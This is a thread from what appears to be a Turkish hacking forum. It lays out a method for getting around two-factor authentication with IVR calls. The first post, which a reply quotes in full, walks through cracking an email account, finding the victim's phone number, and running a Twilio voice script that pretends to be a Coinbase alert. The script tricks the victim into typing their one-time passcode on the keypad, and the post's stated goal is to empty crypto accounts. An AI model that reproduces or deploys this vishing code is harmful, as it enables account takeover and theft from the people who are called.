• Gizli içerikleri açmak için anlamsız yorum yapmak, script isteğinde bulunmak ve link kısaltmak BAN sebebidir.

IVR ile OTP Bypass Methodu

Scorpi0l

Üye
Katılım
20 Tem 2022
Mesajlar
93
Tepkime puanı
132
Puanları
3
Profesyonel şekilde IVR hizmetlerini kullanarak ?OTP (one-time-password) yada diğer adıyla iki adımlı doğrulama kullanan hesaplara yada sistemlere gireceğinizi anlatacağım. Yapacağımız işlem sosyal mühendislik olsa da diğer yöntemlere göre başarı oranı çok yüksek diyebilirim. İlk önce bir IVR hizmeti veren bir firmadan api almamız lazım. Twilio bu yapacağımız işlem için güzel makalenin sonunda Twilio için yazılmış bir Discord botu da vereceğim. Siz Twilio yerine farklı apilerde kullanabilirsiniz fark etmez.

Şimdi örnek olarak son dönemlerde bu yöntem ile genellikle coinbase hesapları hackleniyor ve boşaltılıyor. Bizde bu olay üzerinden bir örnek ile gidelim. Mail hesaplarını checkleyen bir arkadaşın hikayesi olsun bu da;

Saldırgan ilk önce mail checker ile coinbase keyword içeren bir mail hesabı crackliyor.

Mail hesabından kullanıcının telefon numarasını öğreniyor. Twilio ile o numaraya arama başlatıyor.



Kod:
app.post('/coinbase', (request, response) => {

    // Use the Twilio Node.js SDK to build an XML response

    const twiml = new VoiceResponse();



    // Use the <Gather> verb to collect user input

    const gather = twiml.gather({

        action: '/gather',

        method: 'POST',

        input: 'dtmf',

        numDigits: 6,

    });

    gather.say("Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.")



    response.type('text/xml');

    response.send(twiml.toString());

});

 

Grausam09

Üye
Katılım
7 Tem 2022
Mesajlar
105
Tepkime puanı
2
Puanları
13
Profesyonel şekilde IVR hizmetlerini kullanarak ?OTP (one-time-password) yada diğer adıyla iki adımlı doğrulama kullanan hesaplara yada sistemlere gireceğinizi anlatacağım. Yapacağımız işlem sosyal mühendislik olsa da diğer yöntemlere göre başarı oranı çok yüksek diyebilirim. İlk önce bir IVR hizmeti veren bir firmadan api almamız lazım. Twilio bu yapacağımız işlem için güzel makalenin sonunda Twilio için yazılmış bir Discord botu da vereceğim. Siz Twilio yerine farklı apilerde kullanabilirsiniz fark etmez.

Şimdi örnek olarak son dönemlerde bu yöntem ile genellikle coinbase hesapları hackleniyor ve boşaltılıyor. Bizde bu olay üzerinden bir örnek ile gidelim. Mail hesaplarını checkleyen bir arkadaşın hikayesi olsun bu da;

Saldırgan ilk önce mail checker ile coinbase keyword içeren bir mail hesabı crackliyor.

Mail hesabından kullanıcının telefon numarasını öğreniyor. Twilio ile o numaraya arama başlatıyor.



Kod:
app.post('/coinbase', (request, response) => {

    // Use the Twilio Node.js SDK to build an XML response

    const twiml = new VoiceResponse();



    // Use the <Gather> verb to collect user input

    const gather = twiml.gather({

        action: '/gather',

        method: 'POST',

        input: 'dtmf',

        numDigits: 6,

    });

    gather.say("Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.")



    response.type('text/xml');

    response.send(twiml.toString());

});

*** Gizli metin: alıntı yapılamaz. ***
bklm
 
Üst